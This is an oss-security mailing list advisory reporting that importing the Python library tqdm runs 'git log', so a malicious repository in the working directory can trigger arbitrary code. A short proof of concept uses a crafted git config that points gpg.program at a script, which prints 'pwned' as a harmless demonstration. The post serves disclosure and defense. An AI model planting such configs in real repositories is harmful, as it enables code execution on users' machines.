Date: Sun, 25 Dec 2016 21:47:43 +0100 From: Jakub Wilk <jwilk@...lk.net> To: oss-security@...ts.openwall.com Subject: tqdm: insecure use of git tqdm <https://github.com/tqdm/tqdm> is a "fast, extensible progress bar for Python". When you import tqdm, the tqdm._version module executes the following command: git log -n 1 --oneline This was meant to check if the user is running a pre-release version of tqdm. But cwd might be a part of an unrelated git repository, possibly a malicious one. At least with git 2.10 or later, it's possible to craft a repo in which "git log" executes arbitrary code: $ tail -n4 /tmp/.git/config [log] showSignature = true [gpg] program = /tmp/moogpg $ tail -n4 /tmp/moogpg #!/bin/sh exec > /dev/tty 2>&1 cowsay pwned sleep 9999 $ cd /tmp $ pydoc tqdm _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || Upstream bug report: https://github.com/tqdm/tqdm/issues/328 Affected versions: v4.4.1 and later. -- Jakub Wilk
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.